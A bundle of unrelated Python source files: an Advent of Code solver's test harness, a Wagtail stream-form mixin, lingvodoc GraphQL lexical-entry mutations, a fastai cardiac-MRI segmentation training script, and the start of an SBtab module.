    """Read the real puzzle input from disk and solve it."""
    with open('../inputs/d17.txt') as fh:
        puzzle = fh.read().strip()
    return d17(puzzle)
# Entry point: run the sample cases and the real input concurrently in a
# process pool, then cross-check the results.
if __name__ == '__main__':
    cases = [
        #(id, inp, p1, p2),
        (0, "target area: x=20..30, y=-10..-5", 45, 112),
    ]
    """
    # Non multiprocessing version
    for case in cases:
        validate_test(*case)
    p1, p2 = main()
    print(f"p1 = {p1}\np2 = {p2}")
    """
    with Pool(processes=min(8, len(cases) + 1)) as pool:
        # Kick off the real solve and every sample case in parallel.
        main_res = pool.apply_async(main)
        test_res = [pool.apply_async(validate_test, case) for case in cases]
        test_pass, do_p1, do_p2 = True, False, False
        for test in test_res:
            # 30 s timeout per sample case.
            tp, dp1, dp2 = test.get(30)
            test_pass &= tp
            do_p1 |= dp1
            do_p2 |= dp2
        if test_pass:
            # 60 s timeout for the real input.
            p1, p2 = main_res.get(60)
            assert do_p1 or do_p2, "Didn't run any tests"
            assert p1 is None or do_p1 == True, "Got P1 value without 'do_p1' set"
            assert p2 is None or do_p2 == True, "Got P2 value without 'do_p2' set"
            # Known-good answers for this author's puzzle input.
            assert p1 == 5995
            assert p2 == 3202
            print(f"p1 = {p1}\np2 = {p2}")
|
<gh_stars>10-100
# Credit to https://github.com/BertrandBordage for initial implementation
import copy
from collections import OrderedDict
from wagtail.contrib.forms.models import AbstractForm
from hypha.apply.funds.blocks import ApplicationMustIncludeFieldBlock
from .blocks import (
FormFieldBlock,
GroupToggleBlock,
GroupToggleEndBlock,
MultiInputCharFieldBlock,
TextFieldBlock,
)
from .forms import BlockFieldWrapper, PageStreamBaseForm
class BaseStreamForm:
    """Mixin turning a model with a ``form_fields`` stream field into a
    renderable Django form.

    Subclasses provide ``form_fields`` (a StreamField of form-field blocks);
    ``get_form_class`` materialises a one-off form type from it.
    """
    submission_form_class = PageStreamBaseForm

    @classmethod
    def from_db(cls, db, field_names, values):
        """Decode stored ``form_data`` right after the model row is loaded."""
        instance = super().from_db(db, field_names, values)
        if 'form_data' in field_names:
            instance.form_data = cls.deserialize_form_data(instance, instance.form_data, instance.form_fields)
        return instance

    @classmethod
    def deserialize_form_data(cls, instance, form_data, form_fields):
        """Return a copy of ``form_data`` with each value decoded by its block.

        Values whose field id is absent from ``form_data`` are skipped.
        """
        data = form_data.copy()
        # PERFORMANCE NOTE:
        # Do not attempt to iterate over form_fields - that will fully instantiate the form_fields
        # including any sub queries that they do
        for i, field_data in enumerate(form_fields.raw_data):
            block = form_fields.stream_block.child_blocks[field_data['type']]
            field_id = field_data.get('id')
            try:
                value = data[field_id]
            except KeyError:
                pass
            else:
                data[field_id] = block.decode(value)
        return data

    def get_defined_fields(self):
        """Hook returning the stream of field blocks (overridable)."""
        return self.form_fields

    def get_form_fields(self, draft=False, form_data=None):
        """Build an OrderedDict of Django form fields from the stream blocks.

        Args:
            draft: when True, fields other than "must include" ones become
                optional so partial submissions can be saved.
            form_data: submitted data, used to decide whether grouped fields
                are currently visible/required.
        BUGFIX: ``form_data`` previously had a mutable ``{}`` default
        argument (shared across calls); it is now a None sentinel.
        """
        if form_data is None:
            form_data = {}
        form_fields = OrderedDict()
        field_blocks = self.get_defined_fields()
        group_counter = 1
        is_in_group = False
        # If true option 1 is selected
        grouped_fields_visible = False
        for struct_child in field_blocks:
            block = struct_child.block
            struct_value = struct_child.value
            if isinstance(block, FormFieldBlock):
                field_from_block = block.get_field(struct_value)
                if draft and not issubclass(block.__class__, ApplicationMustIncludeFieldBlock):
                    field_from_block.required = False
                field_from_block.help_link = struct_value.get('help_link')
                field_from_block.group_number = group_counter if is_in_group else 1
                if isinstance(block, GroupToggleBlock) and not is_in_group:
                    # A toggle opens a new group; the group's fields are only
                    # visible when the first choice was selected.
                    field_from_block.group_number = 1
                    field_from_block.grouper_for = group_counter + 1
                    group_counter += 1
                    is_in_group = True
                    grouped_fields_visible = form_data.get(struct_child.id) == field_from_block.choices[0][0]
                if isinstance(block, TextFieldBlock):
                    field_from_block.word_limit = struct_value.get('word_limit')
                if isinstance(block, MultiInputCharFieldBlock):
                    # Fan one block out into N copies keyed "<id>_<index>".
                    number_of_inputs = struct_value.get('number_of_inputs')
                    for index in range(number_of_inputs):
                        form_fields[struct_child.id + '_' + str(index)] = field_from_block
                        field_from_block.multi_input_id = struct_child.id
                        field_from_block.add_button_text = struct_value.get('add_button_text')
                        if index == number_of_inputs - 1:  # Add button after last input field
                            field_from_block.multi_input_add_button = True
                        # Index for field until which fields will be visible to applicant.
                        # Initially only the first field with id UUID_0 will be visible.
                        field_from_block.visibility_index = 0
                        field_from_block.max_index = index
                        if index != 0:
                            field_from_block.multi_input_field = True
                            field_from_block.required = False
                            field_from_block.initial = None
                        field_from_block = copy.copy(field_from_block)
                else:
                    if is_in_group and not isinstance(block, GroupToggleBlock):
                        # Inside a group: a field is only required while the
                        # group is visible.
                        field_from_block.required_when_visible = field_from_block.required
                        field_from_block.required = field_from_block.required & grouped_fields_visible
                        field_from_block.visible = grouped_fields_visible
                    form_fields[struct_child.id] = field_from_block
            elif isinstance(block, GroupToggleEndBlock):
                # Group toogle end block is used only to group fields and not used in actual form.
                # Todo: Use streamblock to create nested form field blocks, a more elegant method to group form fields.
                is_in_group = False
            else:
                field_wrapper = BlockFieldWrapper(struct_child)
                field_wrapper.group_number = group_counter if is_in_group else 1
                form_fields[struct_child.id] = field_wrapper
        return form_fields

    def get_form_class(self, draft=False, form_data=None):
        """Create a throwaway form class carrying the generated fields.

        BUGFIX: same mutable-default fix as ``get_form_fields``.
        """
        if form_data is None:
            form_data = {}
        return type('WagtailStreamForm', (self.submission_form_class,), self.get_form_fields(draft, form_data))
class AbstractStreamForm(BaseStreamForm, AbstractForm):
    """Abstract base combining the stream-form mixin with wagtail's
    AbstractForm; concrete form pages inherit from this."""
    class Meta:
        abstract = True
|
import graphene
import time
import string
import random
import logging
from lingvodoc.schema.gql_holders import (
LingvodocObjectType,
CompositeIdHolder,
AdditionalMetadata,
CreatedAt,
MarkedForDeletion,
Relationship,
MovedTo,
fetch_object,
client_id_check,
del_object,
acl_check_by_id,
ResponseError,
LingvodocID,
ObjectVal
)
from lingvodoc.models import (
Entity as dbEntity,
Field as dbField,
PublishingEntity as dbPublishingEntity,
Client,
DBSession,
Group as dbGroup,
LexicalEntry as dbLexicalEntry,
User as dbUser,
BaseGroup as dbBaseGroup
)
from lingvodoc.schema.gql_entity import Entity
from lingvodoc.views.v2.delete import real_delete_lexical_entry
from lingvodoc.utils.creation import create_lexicalentry
from lingvodoc.utils.deletion import real_delete_entity
from pyramid.security import authenticated_userid
from lingvodoc.utils.search import find_all_tags, find_lexical_entries_by_tags
from uuid import uuid4
# Setting up logging.
log = logging.getLogger(__name__)
class LexicalEntry(LingvodocObjectType):
    """GraphQL type wrapping the LexicalEntry DB model.

    #created_at          | timestamp without time zone | NOT NULL
    #object_id           | bigint                      | NOT NULL
    #client_id           | bigint                      | NOT NULL
    #parent_object_id    | bigint                      |
    #parent_client_id    | bigint                      |
    #marked_for_deletion | boolean                     | NOT NULL
    #moved_to            | text                        |
    #additional_metadata | jsonb                       |
    """
    entities = graphene.List(Entity, mode=graphene.String())
    dbType = dbLexicalEntry
    # Optional pre-resolved cache of entities; short-circuits resolve_entities.
    gql_Entities = None
    class Meta:
        interfaces = (CompositeIdHolder, AdditionalMetadata, CreatedAt, MarkedForDeletion, Relationship, MovedTo)
    @fetch_object('entities')
    # @acl_check_by_id('view', 'lexical_entries_and_entities')
    def resolve_entities(self, info, mode='all'):
        """Return this entry's entities, filtered by publishing mode.

        mode maps to (publish, accept) filters on PublishingEntity; rows
        marked for deletion are always excluded (note: 'deleted' and
        'all_with_deleted' currently behave identically because of that).
        """
        if self.gql_Entities is not None:
            return self.gql_Entities
        if mode == 'all':
            publish = None
            accept = True
        elif mode == 'published':
            publish = True
            accept = True
        elif mode == 'not_accepted':
            publish = None
            accept = False
        elif mode == 'deleted':
            publish = None
            accept = None
        elif mode == 'all_with_deleted':
            publish = None
            accept = None
        else:
            raise ResponseError(message="mode: <all|published|not_accepted>")
        result = list()
        # Join Entity with its PublishingEntity row (shared composite id).
        entities = DBSession.query(dbEntity, dbPublishingEntity).\
            filter(dbEntity.parent_client_id == self.dbObject.client_id,
                   dbEntity.parent_object_id == self.dbObject.object_id,
                   dbEntity.client_id == dbPublishingEntity.client_id,
                   dbEntity.object_id == dbPublishingEntity.object_id)
        if publish is not None:
            entities = entities.filter(dbPublishingEntity.published == publish)
        if accept is not None:
            entities = entities.filter(dbPublishingEntity.accepted == accept)
        # yield_per streams rows in batches to bound memory on large entries.
        entities = entities.filter(dbEntity.marked_for_deletion == False).yield_per(100)
        # Wrap a (dbEntity, dbPublishingEntity) pair into a GraphQL Entity.
        def graphene_entity(cur_entity, cur_publishing):
            ent = Entity(id = (cur_entity.client_id, cur_entity.object_id))
            ent.dbObject = cur_entity
            ent.publishingentity = cur_publishing
            return ent
        result = [graphene_entity(entity[0], entity[1]) for entity in entities]
        # for db_entity in self.dbObject.entity:
        #     publ = db_entity.publishingentity
        #     if publish is not None and publ.published != publish:
        #         continue
        #     if accept is not None and publ.accepted != accept:
        #         continue
        #     if db_entity.marked_for_deletion:
        #         continue
        #     ent = Entity(id = [db_entity.client_id, db_entity.object_id])
        #     ent.dbObject = db_entity
        #     ent.publishingentity = publ
        #     result.append(ent)
        return result
class CreateLexicalEntry(graphene.Mutation):
    """GraphQL mutation creating a lexical entry in a perspective.

    example:
    mutation {
        create_lexicalentry(id: [949,21], perspective_id: [71,5]) {
            field {
                id
            }
            triumph
        }
    }
    (this example works)
    returns:
    {
      "create_lexicalentry": {
        "field": {
          "id": [
            949,
            21
          ]
        },
        "triumph": true
      }
    }
    """
    class Arguments:
        # Optional composite id [client_id, object_id] for the new entry.
        id = LingvodocID()
        perspective_id = LingvodocID(required=True)
    lexicalentry = graphene.Field(LexicalEntry)
    triumph = graphene.Boolean()
    @staticmethod
    @client_id_check()
    def mutate(root, info, **args):
        """Create the entry after an ACL check; id defaults to the caller's
        client id with a server-assigned object id."""
        perspective_id = args.get('perspective_id')
        id = args.get('id')
        client_id = id[0] if id else info.context["client_id"]
        object_id = id[1] if id else None
        id = [client_id, object_id]
        info.context.acl_check('create', 'lexical_entries_and_entities', perspective_id)
        dblexentry = create_lexicalentry(id, perspective_id, True)
        """
        perspective_client_id = perspective_id[0]
        perspective_object_id = perspective_id[1]
        object_id = None
        client_id_from_args = None
        if len(id) == 1:
            client_id_from_args = id[0]
        elif len(id) == 2:
            client_id_from_args = id[0]
            object_id = id[1]
        client_id = info.context["client_id"]
        client = DBSession.query(Client).filter_by(id=client_id).first()
        user = DBSession.query(dbUser).filter_by(id=client.user_id).first()
        if not user:
            raise ResponseError(message="This client id is orphaned. Try to logout and then login once more.")
        perspective = DBSession.query(dbDictionaryPerspective). \
            filter_by(client_id=perspective_client_id, object_id=perspective_object_id).first()
        if not perspective:
            raise ResponseError(message="No such perspective in the system")
        if client_id_from_args:
            if check_client_id(authenticated=client.id, client_id=client_id_from_args):
                client_id = client_id_from_args
            else:
                raise ResponseError(message="Error: client_id from another user")
        dblexentry = dbLexicalEntry(object_id=object_id, client_id=client_id,
                                    parent_object_id=perspective_object_id, parent=perspective)
        DBSession.add(dblexentry)
        DBSession.flush()
        """
        # Wrap the DB row into the GraphQL type for the response payload.
        lexicalentry = LexicalEntry(id=[dblexentry.client_id, dblexentry.object_id])
        lexicalentry.dbObject = dblexentry
        return CreateLexicalEntry(lexicalentry=lexicalentry, triumph=True)
class DeleteLexicalEntry(graphene.Mutation):
    """Delete one lexical entry (really on desktop, marked-deleted on server).

    example:
    mutation {
        delete_lexicalentry(id: [949,21]) {
            lexicalentry { id }
            triumph
        }
    }
    now returns:
    {
      "delete_lexicalentry": {
        "lexicalentry": { "id": [949, 21] },
        "triumph": true
      }
    }
    """
    class Arguments:
        id = LingvodocID(required=True)
    triumph = graphene.Boolean()
    @staticmethod
    def mutate(root, info, **args):
        entry_client_id, entry_object_id = args.get('id')
        entry = DBSession.query(dbLexicalEntry).filter_by(
            client_id=entry_client_id, object_id=entry_object_id).first()
        # Refuse both missing and already-deleted entries.
        if entry is None or entry.marked_for_deletion:
            raise ResponseError(message="Error: No such entry in the system")
        # Deletion permission is checked against the entry's perspective.
        info.context.acl_check(
            'delete', 'lexical_entries_and_entities',
            (entry.parent_client_id, entry.parent_object_id))
        settings = info.context["request"].registry.settings
        if 'desktop' in settings:
            # Desktop installations physically remove the entry.
            real_delete_lexical_entry(entry, settings)
        else:
            # Server installations only mark it deleted, recording the action.
            del_object(entry, "delete_lexicalentry", info.context.get('client_id'))
        return DeleteLexicalEntry(triumph=True)
class BulkDeleteLexicalEntry(graphene.Mutation):
    """Delete several lexical entries in one mutation.

    Arguments:
        ids: list of [client_id, object_id] pairs of the entries to delete.

    Raises ResponseError if any referenced entry is missing or already
    deleted; entries processed before the failing one stay deleted.
    """
    class Arguments:
        ids = graphene.List(LingvodocID, required=True)
    lexicalentry = graphene.Field(LexicalEntry)
    triumph = graphene.Boolean()
    @staticmethod
    def mutate(root, info, **args):
        ids = args.get('ids')
        # One shared task id groups the per-entry deletion records.
        task_id = str(uuid4())
        # Settings are request-wide; look them up once instead of per entry.
        settings = info.context["request"].registry.settings
        for lex_id in ids:
            client_id, object_id = lex_id
            dblexicalentry = DBSession.query(dbLexicalEntry).filter_by(
                client_id=client_id, object_id=object_id).first()
            if not dblexicalentry or dblexicalentry.marked_for_deletion:
                raise ResponseError(message="Error: No such entry in the system")
            info.context.acl_check('delete', 'lexical_entries_and_entities',
                                   (dblexicalentry.parent_client_id, dblexicalentry.parent_object_id))
            if 'desktop' in settings:
                real_delete_lexical_entry(dblexicalentry, settings)
            else:
                del_object(dblexicalentry, "bulk_delete_lexicalentry",
                           info.context.get('client_id'), task_id=task_id, counter=len(ids))
        # Bug fix: previously returned DeleteLexicalEntry(...) -- a copy-paste
        # error; a mutation must return its own payload class.
        return BulkDeleteLexicalEntry(triumph=True)
def create_n_entries_in_persp(n, pid, client):
    """Create *n* fresh lexical entries in perspective *pid* for *client*.

    Returns a list of graphene LexicalEntry wrappers, one per created
    database row, with dbObject attached.
    """
    # Object ids are left as None so the database layer assigns them.
    db_entries = [create_lexicalentry([client.id, None], pid, True)
                  for _ in range(n)]
    DBSession.bulk_save_objects(db_entries)
    DBSession.flush()
    wrapped = []
    for db_entry in db_entries:
        gql_entry = LexicalEntry(id=[db_entry.client_id, db_entry.object_id])
        gql_entry.dbObject = db_entry
        wrapped.append(gql_entry)
    return wrapped
class BulkCreateLexicalEntry(graphene.Mutation):
    """Create many lexical entries at once.

    Arguments:
        lexicalentries: list of {"id": [...], "perspective_id": [...]} dicts.
    """
    class Arguments:
        lexicalentries = graphene.List(ObjectVal)
    triumph = graphene.Boolean()
    @staticmethod
    def mutate(root, info, **args):
        requested = args.get('lexicalentries')
        authenticated_client = DBSession.query(Client).filter_by(
            id=info.context["client_id"]).first()
        if authenticated_client is None:
            raise KeyError("Invalid client id (not registered on server). Try to logout and then login.",
                           info.context["client_id"])
        # Create the rows without flushing, then persist them in one batch.
        new_entries = [create_lexicalentry(spec["id"], spec["perspective_id"], False)
                       for spec in requested]
        DBSession.bulk_save_objects(new_entries)
        DBSession.flush()
        return BulkCreateLexicalEntry(triumph=True)
class ConnectLexicalEntries(graphene.Mutation):
    """Join lexical entries into one group via a shared grouping tag.

    Arguments:
        connections: list of [client_id, object_id] pairs of entries to connect.
        field_id: id of the grouping field (must have 'Grouping Tag' data type).
        tag: optional existing tag to connect the entries under; when omitted,
            tags are collected from the entries themselves, and a fresh random
            tag is generated if none are found.
    """
    class Arguments:
        connections = graphene.List(LingvodocID, required = True)
        field_id = LingvodocID(required=True)
        tag = graphene.String()
    triumph = graphene.Boolean()
    @staticmethod
    @client_id_check()
    def mutate(root, info, **args):
        client = DBSession.query(Client).filter_by(id=info.context["client_id"]).first()
        user = DBSession.query(dbUser).filter_by(id=client.user_id).first()
        tags = list()
        # Bug fix: the optional argument is named 'tag', not 'id'; the old
        # args.get('id') always returned None, so an explicitly supplied tag
        # was silently ignored.
        tag = args.get('tag')
        if tag is not None:
            tags.append(tag)
        field_id = args['field_id']
        field = DBSession.query(dbField).\
            filter_by(client_id=field_id[0], object_id=field_id[1]).first()
        if not field:
            raise ResponseError('No such field in the system')
        if field.data_type != 'Grouping Tag':
            raise ResponseError("wrong field data type")
        connections = args['connections']
        # Collect every tag already attached to the entries being connected.
        for par in connections:
            parent = DBSession.query(dbLexicalEntry).\
                filter_by(client_id=par[0], object_id=par[1]).first()
            if not parent:
                raise ResponseError("No such lexical entry in the system")
            par_tags = find_all_tags(parent, field_id[0], field_id[1], False, False)
            for tag in par_tags:
                if tag not in tags:
                    tags.append(tag)
        if not tags:
            # No existing tags anywhere: mint a fresh random one.
            n = 10  # better read from settings
            tag = time.ctime() + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits)
                                         for c in range(n))
            tags.append(tag)
        # Every entry already grouped under any of these tags must also be
        # updated, so the whole group stays consistent.
        lexical_entries = find_lexical_entries_by_tags(tags, field_id[0], field_id[1], False, False)
        for par in connections:
            parent = DBSession.query(dbLexicalEntry).\
                filter_by(client_id=par[0], object_id=par[1]).first()
            if parent not in lexical_entries:
                lexical_entries.append(parent)
        # Override create permission check, depends only on the user.
        # Admin is assumed to have all permissions.
        create_override_flag = (user.id == 1)
        if not create_override_flag:
            group = DBSession.query(dbGroup).join(dbBaseGroup).filter(
                dbBaseGroup.subject == 'lexical_entries_and_entities',
                dbGroup.subject_override == True,
                dbBaseGroup.action == 'create').one()
            create_override_flag = (
                user.is_active and user in group.users)
        create_flag_dict = {}
        for lex in lexical_entries:
            create_flag = create_override_flag
            # Create permission check, depends on the perspective of the
            # lexical entry; cached per perspective.
            if not create_flag:
                perspective_id = (
                    lex.parent_client_id, lex.parent_object_id)
                if perspective_id in create_flag_dict:
                    create_flag = create_flag_dict[perspective_id]
                else:
                    group = DBSession.query(dbGroup).join(dbBaseGroup).filter(
                        dbBaseGroup.subject == 'lexical_entries_and_entities',
                        dbGroup.subject_client_id == perspective_id[0],
                        dbGroup.subject_object_id == perspective_id[1],
                        dbBaseGroup.action == 'create').one()
                    create_flag = (
                        user.is_active and user in group.users)
                    create_flag_dict[perspective_id] = create_flag
            # Ensuring that the lexical entry has all link tags.
            for tag in tags:
                tag_entity = DBSession.query(dbEntity) \
                    .join(dbEntity.field) \
                    .join(dbEntity.publishingentity) \
                    .filter(dbEntity.parent == lex,
                            dbField.client_id == field_id[0],
                            dbField.object_id == field_id[1],
                            dbEntity.content == tag,
                            dbEntity.marked_for_deletion == False).first()
                if not tag_entity:
                    tag_entity = dbEntity(
                        client_id = client.id,
                        field = field,
                        content = tag,
                        parent = lex)
                    if create_flag:
                        tag_entity.publishingentity.accepted = True
                    # If we are the admin, we automatically publish link entities.
                    if user.id == 1:
                        tag_entity.publishingentity.published = True
        return ConnectLexicalEntries(triumph=True)
class DeleteGroupingTags(graphene.Mutation):
    """Delete all grouping-tag entities of one lexical entry for a field.

    triumph is true when at least one tag entity was deleted, false when the
    entry had no matching tag entities.
    """
    class Arguments:
        id = LingvodocID(required=True)
        field_id = LingvodocID(required=True)
    triumph = graphene.Boolean()
    @staticmethod
    @acl_check_by_id('delete', 'lexical_entries_and_entities', id_key= "parent_id")
    def mutate(root, info, **args):
        """
        mutation DeleteTag{
            delete_grouping_tags(field_id: [66,25]
                                 id:[1523, 9499]
            ) {
                triumph
            }
        }
        """
        settings = info.context["request"].registry.settings
        request = info.context.request
        variables = {'auth': authenticated_userid(request)}
        client = DBSession.query(Client).filter_by(id=variables['auth']).first()
        user = DBSession.query(dbUser).filter_by(id=client.user_id).first()
        client_id, object_id = args.get("id")
        field_client_id, field_object_id = args.get("field_id")
        field = DBSession.query(dbField).filter_by(client_id=field_client_id,
                                                   object_id=field_object_id).first()
        # Consistency fix: raise ResponseError like every other mutation in
        # this module instead of returning a bare {'error': ...} dict, which
        # graphene cannot serialize as this mutation's payload.
        if not field:
            raise ResponseError(message="No such field in the system")
        elif field.data_type != 'Grouping Tag':
            raise ResponseError(message="Wrong type of field")
        entities = DBSession.query(dbEntity).filter_by(field_client_id=field_client_id,
                                                       field_object_id=field_object_id,
                                                       parent_client_id=client_id,
                                                       parent_object_id=object_id, marked_for_deletion=False).all()
        if entities:
            for dbentity in entities:
                if 'desktop' in settings:
                    # Desktop installations physically remove the entity.
                    real_delete_entity(dbentity, settings)
                else:
                    del_object(dbentity, "delete_grouping_tags", info.context.get('client_id'))
            return DeleteGroupingTags(triumph=True)
        return DeleteGroupingTags(triumph=False)
|
#!/usr/bin/env python
# coding: utf-8
import argparse
from fastai.vision import *
from tqdm import tqdm
from pathlib import Path
import pandas as pd
import os
import sys
from fastai.callbacks import CSVLogger
# suppress anoying and irrelevant warning, see https://forums.fast.ai/t/warnings-when-trying-to-make-an-imagedatabunch/56323/9
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch.nn.functional")
# Command-line configuration for the no-pretraining segmentation run.
parser = argparse.ArgumentParser()
parser.add_argument('--size', dest='size', help='scale images to size', default=256, type=int)
parser.add_argument('--bs', dest='bs', help='batch size', default=32, type=int)
parser.add_argument('--cuda_device', dest='cuda_device', help='cuda device index', default=0, type=int)
parser.add_argument('--confidence', dest='confidence', help='confidence cutoff in percent', default=10, type=int)
parser.add_argument('--model', dest='model', help='model, one of resnet34, resnet50, vgg16', default='resnet34', type=str)
parser.add_argument('--tfms', dest='tfms', help='transformations, one of the presets no, normal, extreme', default='normal', type=str)
parser.add_argument('--loss', dest='loss', help='loss function, one of the presets ce, focal, softdice', default='ce', type=str)
args = parser.parse_args()

# Preset lookup tables for the --model and --tfms options.
our_models = {"resnet34": models.resnet34, "resnet50": models.resnet50, "vgg16": models.vgg16_bn}
our_tfms = {
    "no": None,
    "normal": get_transforms(do_flip=False, max_rotate=20, max_lighting=.4, max_zoom=1.2),
    "extreme": get_transforms(do_flip=True, max_rotate=90, max_lighting=.4, max_zoom=1.2)
}

# Robustness fix: validate --model and --tfms the same way as --loss, so a
# typo produces a clear message instead of a KeyError traceback.
if args.model not in our_models:
    sys.exit("Unknown model")
if args.tfms not in our_tfms:
    sys.exit("Unknown transformation preset")
if args.loss not in ["ce", "focal", "softdice"]:
    sys.exit("Unknown loss function")

size = args.size
bs = args.bs
cuda_device = args.cuda_device
confidence_cutoff = args.confidence / 100
model = our_models[args.model]
tfms = our_tfms[args.tfms]
# Run name encodes the whole configuration; doubles as the output directory.
name = "noPretrain_{}_{}percent_size{}_{}Tfms_{}Loss".format(args.model, args.confidence, size, args.tfms, args.loss)

torch.cuda.set_device(cuda_device)
# Intentionally fails if the output directory already exists, so an earlier
# run is never overwritten.
os.mkdir(name)

# Masks live next to the images, with 'images' replaced by 'masks_2class'.
get_y_fn = lambda x: str(x).replace("images", "masks_2class")

# Keep only images whose segmentation score passes the confidence cutoff.
imgList = pd.read_csv("nifti/image_list_filtered_score.tsv", sep="\t")
filteredList = imgList[imgList.score <= confidence_cutoff]

src = (SegmentationItemList.from_df(filteredList, path="nifti", cols="file")
       .split_from_df(col='is_val')
       .label_from_func(get_y_fn, classes=np.array(["background", "left_ventricle", "myocardium"])))
data = (src.transform(tfms, size=size, padding_mode="zeros", resize_method=ResizeMethod.PAD, tfm_y=True)
        .databunch(bs=bs)
        .normalize(imagenet_stats))
def acc_seg(input, target):
    """Per-pixel accuracy for segmentation: fraction of pixels whose argmax
    class matches the target mask (channel axis squeezed away)."""
    predicted_classes = input.argmax(dim=1)
    flat_target = target.squeeze(1)
    correct = predicted_classes == flat_target
    return correct.float().mean()
def multi_dice(input:Tensor, targs:Tensor, class_id=0, inverse=False)->Rank0Tensor:
    """Batch-mean Dice score of the predicted segmentation for one class.

    The prediction is reduced to a binary mask for class_id (or its
    complement when inverse=True) and compared with the target mask.
    """
    batch_size = targs.shape[0]
    predictions = input.argmax(dim=1).view(batch_size, -1)
    # Binarise: 1 where the pixel belongs to class_id, 0 elsewhere.
    pred_mask = (predictions == class_id).float()
    true_mask = (targs.view(batch_size, -1) == class_id).float()
    if inverse:
        # Score the complement of the class instead.
        pred_mask, true_mask = 1 - pred_mask, 1 - true_mask
    overlap = (pred_mask * true_mask).sum(dim=1).float()
    total = (pred_mask + true_mask).sum(dim=1).float()
    per_image = 2. * overlap / total
    # Empty prediction and empty target (0/0) counts as a perfect match.
    per_image[torch.isnan(per_image)] = 1
    return per_image.mean()
# Named partial metrics: combined foreground (inverse of background) Dice and
# per-class Dice for left ventricle and myocardium; __name__ controls how
# each metric is labelled in fastai's training log.
dice0inv = partial(multi_dice, class_id=0, inverse=True)
dice1 = partial(multi_dice, class_id=1)
dice2 = partial(multi_dice, class_id=2)
for _metric, _label in ((dice0inv, 'diceComb'), (dice1, 'diceLV'), (dice2, 'diceMY')):
    _metric.__name__ = _label
class SoftDiceLoss(nn.Module):
    '''Soft (differentiable) Dice loss for channel-first multi-class logits.

    Rewritten from the channels-last / one-hot formulation whose own warning
    noted it did not work here (it also used numpy ops on tensors and left
    debug prints in). This version accepts what the rest of this script
    produces:
        inputs:  b x c x X x Y(...)  raw network logits,
        targets: b x 1 x X x Y(...)  (or b x X x Y(...)) integer class labels.
    It softmaxes over the class channel, one-hot encodes the targets, and
    returns 1 - mean Dice over classes and batch.

    epsilon: numerical-stability term avoiding division by zero.

    References:
        https://www.jeremyjordan.me/semantic-segmentation/
        V-Net: https://arxiv.org/abs/1606.04797
        https://mediatum.ub.tum.de/doc/1395260/1395260.pdf (page 72)
    '''
    def __init__(self, epsilon=1e-8):
        super().__init__()
        self.epsilon = epsilon

    def forward(self, inputs, targets):
        num_classes = inputs.shape[1]
        probs = nn.functional.softmax(inputs, dim=1)
        # Drop the singleton channel axis fastai keeps on mask targets.
        if targets.dim() == inputs.dim():
            targets = targets.squeeze(1)
        one_hot = nn.functional.one_hot(targets.long(), num_classes)
        # one_hot is channels-last (b, X, Y..., c); move classes to axis 1.
        dims = (0, one_hot.dim() - 1) + tuple(range(1, one_hot.dim() - 1))
        one_hot = one_hot.permute(*dims).float()
        # Sum over the spatial axes only, keeping batch and class axes.
        axes = tuple(range(2, probs.dim()))
        numerator = 2. * (probs * one_hot).sum(dim=axes)
        denominator = (probs * probs + one_hot * one_hot).sum(dim=axes)
        # Average over classes and batch.
        return 1 - torch.mean(numerator / (denominator + self.epsilon))
# adjusted from https://forums.fast.ai/t/loss-function-of-unet-learner-flattenedloss-of-crossentropyloss/51605
class FocalLoss(nn.Module):
    """Focal loss: cross entropy down-weighted for well-classified pixels.

    gamma: focusing exponent; 0 reduces to plain cross entropy.
    reduction: 'mean' (default), 'sum', or anything else for the unreduced
        per-element loss.
    """
    def __init__(self, gamma=2., reduction='mean'):
        super().__init__()
        self.gamma = gamma
        self.reduction = reduction

    def forward(self, inputs, targets):
        CE_loss = CrossEntropyFlat(axis=1, reduction='none')(inputs, targets)
        # pt is the model's probability for the true class.
        pt = torch.exp(-CE_loss)
        F_loss = ((1 - pt) ** self.gamma) * CE_loss
        if self.reduction == 'sum':
            return F_loss.sum()
        elif self.reduction == 'mean':
            return F_loss.mean()
        # Bug fix: previously fell through and returned None for any other
        # reduction; return the unreduced loss instead ('none' semantics).
        return F_loss
# Build the U-Net learner from scratch (no ImageNet pretraining) and log all
# training metrics to <name>/train_log.
learn = unet_learner(data, model, pretrained=False, metrics=[acc_seg, dice0inv, dice1, dice2],
                     callback_fns=[partial(CSVLogger, append=True, filename="train_log")], path=name)
if args.loss == "focal":
    learn.loss_func = FocalLoss()
if args.loss == "softdice":
    learn.loss_func = SoftDiceLoss()

learn.unfreeze()
# Record the LR-finder curve for later inspection.
lr_find(learn)
fig = learn.recorder.plot(return_fig=True)
fig.savefig(name + "/lrfind_unfreeze.png")

lr = 1e-5
# Train in three stages (5 + 10 + 15 epochs), checkpointing and saving the
# loss curve after each stage under the cumulative epoch count.
epochs_done = 0
for stage_epochs in (5, 10, 15):
    learn.fit_one_cycle(stage_epochs, lr)
    epochs_done += stage_epochs
    learn.save("{}-unfreeze-{}".format(name, epochs_done))
    fig = learn.recorder.plot_losses(return_fig=True)
    fig.savefig("{}/unfreeze-{}.png".format(name, epochs_done))

learn.export('model.pkl')
# Make Predictions
# Run the exported model over the full (unfiltered) image list in batches of
# 10000 and count predicted left-ventricle / myocardium pixels per image.
fullImgList = pd.read_csv("nifti/image_list.tsv", sep="\t", header=None, names=["pid", "file"])
pixelTable = pd.DataFrame({'file': [], 'lv_pixels': [], 'my_pixels': []})
# Performance fix: load the trained model once instead of re-reading
# model.pkl from disk on every batch; add_test() replaces the previous
# batch's test set on each iteration.
trainedModel = load_learner(name, 'model.pkl')
for i in tqdm(range(int(fullImgList.shape[0] / 10000) + 1)):
    imgInBatch = fullImgList[(10000 * i):(10000 * (i + 1))]
    trainedModel.data.add_test(SegmentationItemList.from_df(imgInBatch, path="nifti", cols="file"), tfm_y=False)
    predictions, _ = trainedModel.get_preds(DatasetType.Test)
    predictions = predictions.argmax(dim=1)
    lv_pixels = (predictions == 1).sum(dim=(1, 2))
    my_pixels = (predictions == 2).sum(dim=(1, 2))
    pixelTable = pd.concat([pixelTable, pd.DataFrame({'file': trainedModel.data.test_ds.items,
                                                      'lv_pixels': lv_pixels, 'my_pixels': my_pixels})])
pixelTable.to_csv(name + "/predictions.tsv", sep="\t", index=False)
|
"""
tablib.dictionary.sbtab_dict
~~~~~~~~~~~~~
A wrapper object for handling an SBtab with multiple tables using
a dictionary.
Also, includes methods for I/O between SQLite and SBtab.
"""
# -*- coding: utf-8 -*-
import misc
from SBtab import SBtabTable, SBtabError
import tablib
